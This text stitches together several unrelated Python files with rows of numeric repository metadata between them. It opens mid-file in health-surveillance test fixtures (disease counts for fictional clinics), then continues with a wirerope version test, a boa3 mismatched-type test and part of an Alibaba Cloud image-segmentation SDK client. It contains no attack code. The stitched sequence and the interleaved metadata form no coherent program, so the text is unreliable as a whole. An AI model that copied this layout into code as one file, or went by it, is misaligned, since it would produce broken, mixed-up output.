"variables": {"data_entry":1, "vac_i0_var":0,"vac_i12_var":0,"vac_ses":0,"vac_pw_vat1":0,"vac_pw_vat2":0,"vac_pw_vat3":0,"vac_pw_vat4":0,"vac_pw_vat5":0,"vac_i0_bcg":0,"vac_i0_vpi":0,"vac_i12_bcg":0,"vac_i0_dtc1":0,"vac_i0_dtc2":0,"vac_i0_dtc3":0,"vac_i0_pcv1":0,"vac_i0_pcv2":0,"vac_i0_pcv3":0,"vac_i12_vpi":0,"vac_i0_vpo0":0,"vac_i0_vpo1":0,"vac_i0_vpo2":0,"vac_i0_vpo3":0,"vac_notpw_vat1":0,"vac_notpw_vat2":0,"vac_notpw_vat3":0,"vac_notpw_vat4":0,"vac_notpw_vat5":0,"vac_i12_dtc1":0,"vac_i12_dtc2":0,"vac_i12_dtc3":0,"vac_i12_pcv1":0,"vac_i12_pcv2":0,"vac_i12_pcv3":0,"vac_i0_rota1":0,"vac_i0_rota2":0,"vac_i0_rota3":0,"vac_i12_vpo0":0,"vac_i12_vpo1":0,"vac_i12_vpo2":0,"vac_i12_vpo3":0,"vac_i12_rota1":0,"vac_i12_rota2":0,"vac_i12_rota3":0
},'clinic': 11, 'geolocation': 'POINT(-0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{
'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9378', 'clinic_type': 'Hospital', 'district': 6,
"variables": {"data_entry":1, "vac_i0_var":1,"vac_i12_var":1,"vac_ses":1,"vac_pw_vat1":1,"vac_pw_vat2":1,"vac_pw_vat3":1,"vac_pw_vat4":1,"vac_pw_vat5":1,"vac_i0_bcg":1,"vac_i0_vpi":1,"vac_i12_bcg":1,"vac_i0_dtc1":1,"vac_i0_dtc2":1,"vac_i0_dtc3":1,"vac_i0_pcv1":1,"vac_i0_pcv2":1,"vac_i0_pcv3":1,"vac_i12_vpi":1,"vac_i0_vpo0":1,"vac_i0_vpo1":1,"vac_i0_vpo2":1,"vac_i0_vpo3":1,"vac_notpw_vat1":1,"vac_notpw_vat2":1,"vac_notpw_vat3":1,"vac_notpw_vat4":1,"vac_notpw_vat5":1,"vac_i12_dtc1":1,"vac_i12_dtc2":1,"vac_i12_dtc3":1,"vac_i12_pcv1":1,"vac_i12_pcv2":1,"vac_i12_pcv3":1,"vac_i0_rota1":1,"vac_i0_rota2":1,"vac_i0_rota3":1,"vac_i12_vpo0":1,"vac_i12_vpo1":1,"vac_i12_vpo2":1,"vac_i12_vpo3":1,"vac_i12_rota1":1,"vac_i12_rota2":1,"vac_i12_rota3":1
},'clinic': 11, 'geolocation': 'POINT(-0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2016, 4, 30, 23, 54, 16, 49059)})
]
#Freeze date of test 24th Dec 2016
#id 1,
#comp_week - completeness in the recent week, 25, only clinic A reported every day.
#clinic_num - 4 health facilities
#!!!comp_year = approx 1.9. In last 51 weeks in total we had completeness 100& only one week.
#dea_0 - reported deaths, it is 7 this week in clinic A.
# dea_0 ale_1 - deaths from community (5)
# cmd_21 - maternal, ale_1 maternal investigated
# cmd_22 - neonatal, ale_1 investigated
oms_report = [
#completeness, Districts Blue, Red and Green
Data(**{"uuid":"10","type":"case","date":"2016-12-20T00:00:00", "epi_week": 51, "country":1,"region":2,"district":4,"clinic":7,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"reg_1":1,
"reg_5":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"100","type":"case","date":"2016-12-20T00:00:00","epi_week": 51,"country":1,"region":2,"district":4,"clinic":8,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"reg_1":1,
"reg_5":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"101","type":"case","date":"2016-12-19T00:00:00","epi_week": 51,"country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"reg_1":2,
"reg_5":2
},"geolocation": "POINT(0 0)"}),
# Data(**{"uuid":"102","type":"case","date":"2016-12-21T00:00:00","country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
# "variables": {"data_entry":1,
# "reg_1":5,
# "reg_5":5
# },"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"11","type":"case","date":"2016-11-20T00:00:00","country":1,"epi_week": 51,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"reg_1":1,
"reg_5":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"12","type":"case","date":"2016-12-20T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"reg_1":4,
"reg_5":4
},"geolocation": "POINT(0 0)"}),
#Completeness in the week after date of the report. Shouldn't change the weekly completeness
#4 daily registers means that completeness in this week is 100
Data(**{"uuid":"112","type":"case","date":"2016-12-29T00:00:00","epi_week": 52,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"reg_1":4,
"reg_5":4
},"geolocation": "POINT(0 0)"}),
#50 deaths and 50 cases of sever malnutrition `dea_0` and `cmd_24` in a week after the report. Shouldn't appear in weekly highlights
Data(**{"uuid":"113","type":"case","date":"2016-12-29T00:00:00","epi_week": 52,"country":1,"region":2,"district":4,"clinic":7,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"dea_0":50,
"cmd_24":50,
},"geolocation": "POINT(0 0)"}),
#THIS WEEK
#Clinic A
#14 deaths (dea_0) in this week, half of them (ale_1) from community
#21 cases of severe malnutrition `cmd_24` in Region Major and 11 of moderate (`cmd_23`)
#120 cases of fever (mls_2) and 40 cases tested (mls_3)
#MALARIA data
#10 deaths from malaria (mls_36)
#30 positively tested cases of malaria (cmd_17), it is 30/40 of tested (mls_3)
#10 simple (mls_12) and 20 sever (mls_24), 15 (mls_48) treated with ACT
Data(**{"uuid":"1","type":"case","date":"2016-12-20T00:00:00","epi_week": 51,"country":1,"region":2,"district":4,"clinic":7,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"mls_2":120,
"mls_3":40,
"mls_12":10,
"mls_24":20,
"mls_48":15,
"dea_0":7,
"mls_36":10,
"cmd_17":30
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"2","type":"case","date":"2016-12-20T00:00:00","epi_week": 51,"country":1,"region":2,"district":4,"clinic":7,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"dea_0":7,
"ale_1":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"3","type":"case","date":"2016-10-24T00:00:00","epi_week": 47,"country":1,"region":2,"district":4,"clinic":7,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
},"geolocation": "POINT(0 0)"}),
#Measles for WEEKLY HIGHLIGHTS
#125 cases in total (cmd_15)
#40 suspected but not tested
#ale_1 investigated (50)
#ale_2 confirmed (25)
#age_1 10 among children <5
Data(**{"uuid":"13","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_15":40
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"14","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_15":10,
"age_1":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"15","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_15":50,
"ale_1":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"16","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_15":25,
"ale_2":1
},"geolocation": "POINT(0 0)"}),
#Acute flaccid paralysis for WEEKLY HIGHLIGHTS
#99 cases suspected (cmd_10)
#ale_1 investigated (33)
Data(**{"uuid":"17","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_10":66,
"mor_11":33
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"18","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_10":33,
"ale_1":1
},"geolocation": "POINT(0 0)"}),
#Malnutrition for WEEKLY HIGHLIGHTS
#severe malnutrition `cmd_24` : 40, moderate `cmd_23`, 20, 40 from Major and 20 from minor
#major
Data(**{"uuid":"20","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":2,"district":4,"clinic":7,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_24":21,
"cmd_23":19,
},"geolocation": "POINT(0 0)"}),
#minor
Data(**{"uuid":"21","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_24":19,
"cmd_23":1,
},"geolocation": "POINT(0 0)"}),
#All cases in clinc C,
# REPORTED only
#Diarrhoea.
#15 `cmd_1` acute and `mor_18` 10 deaths
#22 `cmd_4` bloody (dysentery)
#12 `cmd_2` watery (cholera)
#40 cases `cmd_25` ARTI (Acute respiratory tract infection)
#23 cases `cmd_18`influenza like ilness
#100 cases `cmd_27` of animal bites
#20 UNCOMFIRMED cases of Rabies `cmd_11`
#99 UNCOMFIRMED cases of Plague `cmd_7`
Data(**{"uuid":"22","type":"case","date":"2016-12-22T00:00:00","epi_week": 51,"country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_1":15,
"mor_18":10,
"cmd_4":22,
"cmd_2":12,
"cmd_25":40,
"cmd_18":23,
"cmd_27":100,
"cmd_11":20,
"cmd_7":99
},"geolocation": "POINT(0 0)"}),
#clinic C cases INVESTIGATED `ale_1`
#76 investigated cases of Plague `cmd_7` with `ale_1`
Data(**{"uuid":"23","type":"case","date":"2016-12-23T00:00:00","epi_week": 51,"country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_7":76,
"ale_1":1,
},"geolocation": "POINT(0 0)"}),
#clinic C cases CONFIRMED
#Confirmed Rabies
#15 confirmed cases of Rabies `cmd_11` with `ale_2`
#16 confirmed cases of Plague `cmd_7` with `ale_2`
Data(**{"uuid":"24","type":"case","date":"2016-12-21T00:00:00","epi_week": 51,"country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_11":15,
"cmd_7":16,
"ale_2":1,
},"geolocation": "POINT(0 0)"}),
#Clinic B, District Blue, Region Major.
#14 Maternal deaths and 10 neonatal NOT investigated
Data(**{"uuid":"6","type":"case","date":"2016-12-24T00:00:00","epi_week": 51,"country":1,"region":2,"district":4,"clinic":8,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_21":14,
"cmd_22":10,
},"geolocation": "POINT(0 0)"}),
#5 Maternal deaths and 2 neonatal *investigated*
Data(**{"uuid":"7","type":"case","date":"2016-12-24T00:00:00","epi_week": 51,"country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_21":5,
"cmd_22":2,
"ale_1":1
},"geolocation": "POINT(0 0)"}),
# # 1 maternal death and 1 neonatal investiaged in District Green
Data(**{"uuid":"70","type":"case","date":"2016-12-24T00:00:00","epi_week": 51,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_21":1,
"cmd_22":1,
"ale_1":1
},"geolocation": "POINT(0 0)"}),
#
#
# PREVIOUS WEEKS
# SHOULDN'T be in Weekly Highlights
#
#
#Clinic B, District Blue, Region Major.
#17 Maternal deaths and 17 neonatal NOT investigated
Data(**{"uuid":"31","type":"case","date":"2016-10-24T00:00:00","epi_week": 37,"country":1,"region":2,"district":4,"clinic":8,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_21":17,
"cmd_22":17,
},"geolocation": "POINT(0 0)"}),
#Malaria map takes cases of `epi_1` and `epi_2`
#malaria map by type `mls_12`, `mls_24`, `mls_3`
#clinic C in region major of population 750
Data(**{"uuid":"32","type":"case","date":"2016-11-20T00:00:00","epi_week": 47,"country":1,"region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"epi_1":7,
"epi_2":25,
"mls_12":14,
"mls_24":22,
"mls_3":100
},"geolocation": "POINT(0 0)"}),
#clinic D in region minor of population 250
Data(**{"uuid":"33","type":"case","date":"2016-11-24T00:00:00","epi_week": 47,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"epi_1":25,
"epi_2":75,
"mls_12":4,
"mls_24":2,
"mls_3":10
},"geolocation": "POINT(0 0)"}),
#Measles over 5 yo
# 13 cases
Data(**{"uuid":"34","type":"case","date":"2016-11-24T00:00:00","epi_week": 47,"country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_15":13,
"mor_13":5,
"age_3":1
},"geolocation": "POINT(0 0)"}),
Data(**{"uuid":"35","type":"case","date":"2016-11-11T00:00:00","epi_week": 46, "country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_15":7,
"age_5":5
},"geolocation": "POINT(0 0)"}),
#Severe malnutrition under 5yo
#It is from epi code 8
# 5 cases in week in September of malnutrition in clinicD
Data(**{"uuid":"36","type":"case","date":"2016-09-11T00:00:00","epi_week": 37, "country":1,"region":3,"district":6,"clinic":10,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"epi_8":5
},"geolocation": "POINT(0 0)"}),
#Table priority diseases cumulative information
#Acute diarrhoea case from previous week (july) to alter cumulative
Data(**{"uuid":"37","type":"case","date":"2016-07-22T00:00:00","country":1,"epi_week": 30, "region":2,"district":5,"clinic":9,"clinic_type":"test","links":{},"tags":[],
"variables": {"data_entry":1,
"cmd_1":80,
"mor_18":70,
},"geolocation": "POINT(0 0)"}),
]
date = datetime.date.today()
start = datetime.datetime(date.year, 1, 1)
offset = date.weekday() - start.weekday()
if offset < 0:
offset = 7 + offset
completeness = [
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1}, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': date - datetime.timedelta(days=1 + offset), 'case_type': ['mh']}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a2', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1}, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': date - datetime.timedelta(days=2 + offset), 'case_type': ['mh']}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a3', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1}, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': date - datetime.timedelta(days=3 + offset), 'case_type': ['mh']}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a4', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1}, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': date - datetime.timedelta(days=8 + offset), 'case_type': ['mh']}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a5', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1}, 'clinic': 8, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': date - datetime.timedelta(days=1 + offset), 'case_type': ['pip']}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a6', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1}, 'clinic': 8, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': date - datetime.timedelta(days=1 + offset), 'case_type': ['pip']}) # Same day should not count,
]
latest_test = [
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'test_1': 1, 'test_2': 5}, 'clinic': 7, 'region': 2, 'country': 1, "date":"2017-01-02T00:00:00"}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'test_1': 1, 'test_2': 7}, 'clinic': 7, 'region': 2, 'country': 1, "date":"2017-01-03T00:00:00"}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'test_1': 1, 'test_2': 5}, 'clinic': 8, 'region': 2, 'country': 1, "date":"2017-01-02T00:00:00"}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'test_1': 1, 'test_2': 5}, 'clinic': 8, 'region': 2, 'country': 1, "date":"2017-01-03T00:00:00"}),
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'test_1': 1 }, 'clinic': 8, 'region': 2, 'country': 1, "date":"2017-01-10T00:00:00"})
]
| 158.857355 | 1,290 | 0.596964 | 16,826 | 106,911 | 3.638417 | 0.038215 | 0.016171 | 0.098791 | 0.10428 | 0.912055 | 0.904035 | 0.89706 | 0.887765 | 0.879582 | 0.876642 | 0 | 0.139952 | 0.13009 | 106,911 | 672 | 1,291 | 159.09375 | 0.518306 | 0.036488 | 0 | 0.15458 | 0 | 0 | 0.481591 | 0.041112 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.003817 | 0 | 0.003817 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ec3489135e45a3e3273966728a457b2465effe80 | 119 | py | Python | tests/test_wirerope.py | jsirois/wirerope | 81c533d6df479cae80f74b5c298c4236f98f0158 | [
"BSD-2-Clause-FreeBSD"
] | 4 | 2019-10-27T16:46:43.000Z | 2021-12-03T10:35:53.000Z | tests/test_wirerope.py | jsirois/wirerope | 81c533d6df479cae80f74b5c298c4236f98f0158 | [
"BSD-2-Clause-FreeBSD"
] | 17 | 2018-06-24T14:59:18.000Z | 2022-02-17T06:32:12.000Z | tests/test_wirerope.py | jsirois/wirerope | 81c533d6df479cae80f74b5c298c4236f98f0158 | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2021-02-19T03:36:47.000Z | 2022-02-16T16:39:36.000Z | import wirerope
def test_package():
assert wirerope.__version__
assert wirerope.__version__.startswith('0.')
| 17 | 48 | 0.756303 | 13 | 119 | 6.230769 | 0.692308 | 0.345679 | 0.518519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009901 | 0.151261 | 119 | 6 | 49 | 19.833333 | 0.792079 | 0 | 0 | 0 | 0 | 0 | 0.016807 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6b5eaf2c3aef4f779e29d29dfd8c5d4f9969671b | 108 | py | Python | boa3_test/test_sc/interop_test/stdlib/MemoryCompareMismatchedType.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 25 | 2020-07-22T19:37:43.000Z | 2022-03-08T03:23:55.000Z | boa3_test/test_sc/interop_test/stdlib/MemoryCompareMismatchedType.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 419 | 2020-04-23T17:48:14.000Z | 2022-03-31T13:17:45.000Z | boa3_test/test_sc/interop_test/stdlib/MemoryCompareMismatchedType.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 15 | 2020-05-21T21:54:24.000Z | 2021-11-18T06:17:24.000Z | from boa3.builtin.interop.stdlib import memory_compare
def main() -> int:
return memory_compare(1, 1)
| 18 | 54 | 0.740741 | 16 | 108 | 4.875 | 0.8125 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032967 | 0.157407 | 108 | 5 | 55 | 21.6 | 0.824176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 7 |
6bf2cb1f64a5d8c8b39236cde015e34ccb4feefc | 38,717 | py | Python | imageseg-20191230/python/alibabacloud_imageseg20191230/client.py | atptro/alibabacloud-sdk | 65d4a000e4f4059b58ca1bc3d032853aedef4f3f | [
"Apache-2.0"
] | null | null | null | imageseg-20191230/python/alibabacloud_imageseg20191230/client.py | atptro/alibabacloud-sdk | 65d4a000e4f4059b58ca1bc3d032853aedef4f3f | [
"Apache-2.0"
] | null | null | null | imageseg-20191230/python/alibabacloud_imageseg20191230/client.py | atptro/alibabacloud-sdk | 65d4a000e4f4059b58ca1bc3d032853aedef4f3f | [
"Apache-2.0"
] | null | null | null | # This file is auto-generated, don't edit it. Thanks.
from alibabacloud_tea_rpc.client import Client as RPCClient
from alibabacloud_imageseg20191230 import models as imageseg_20191230_models
from alibabacloud_tea_util import models as util_models
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_tea_rpc import models as _rpc_models
from alibabacloud_openplatform20191219.client import Client as OpenPlatformClient
from alibabacloud_openplatform20191219 import models as open_platform_models
from alibabacloud_oss_sdk import models as _oss_models
from alibabacloud_rpc_util.client import Client as RPCUtilClient
from alibabacloud_oss_sdk.client import Client as OSSClient
from alibabacloud_tea_fileform import models as file_form_models
from alibabacloud_oss_util import models as ossutil_models
from alibabacloud_endpoint_util.client import Client as EndpointUtilClient
class Client(RPCClient):
def __init__(self, config):
super().__init__(config)
self._endpoint_rule = "regional"
self.check_config(config)
self._endpoint = self.get_endpoint("imageseg", self._region_id, self._endpoint_rule, self._network, self._suffix, self._endpoint_map, self._endpoint)
def segment_animal(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentAnimalResponse().from_map(self.do_request("SegmentAnimal", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_animal_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_animalreq = imageseg_20191230_models.SegmentAnimalRequest(
)
RPCUtilClient.convert(request, segment_animalreq)
segment_animalreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_animal_resp = self.segment_animal(segment_animalreq, runtime)
return segment_animal_resp
def segment_hdbody(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentHDBodyResponse().from_map(self.do_request("SegmentHDBody", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_hdbody_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_hdbodyreq = imageseg_20191230_models.SegmentHDBodyRequest(
)
RPCUtilClient.convert(request, segment_hdbodyreq)
segment_hdbodyreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_hdbody_resp = self.segment_hdbody(segment_hdbodyreq, runtime)
return segment_hdbody_resp
def segment_sky(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentSkyResponse().from_map(self.do_request("SegmentSky", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_sky_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_skyreq = imageseg_20191230_models.SegmentSkyRequest(
)
RPCUtilClient.convert(request, segment_skyreq)
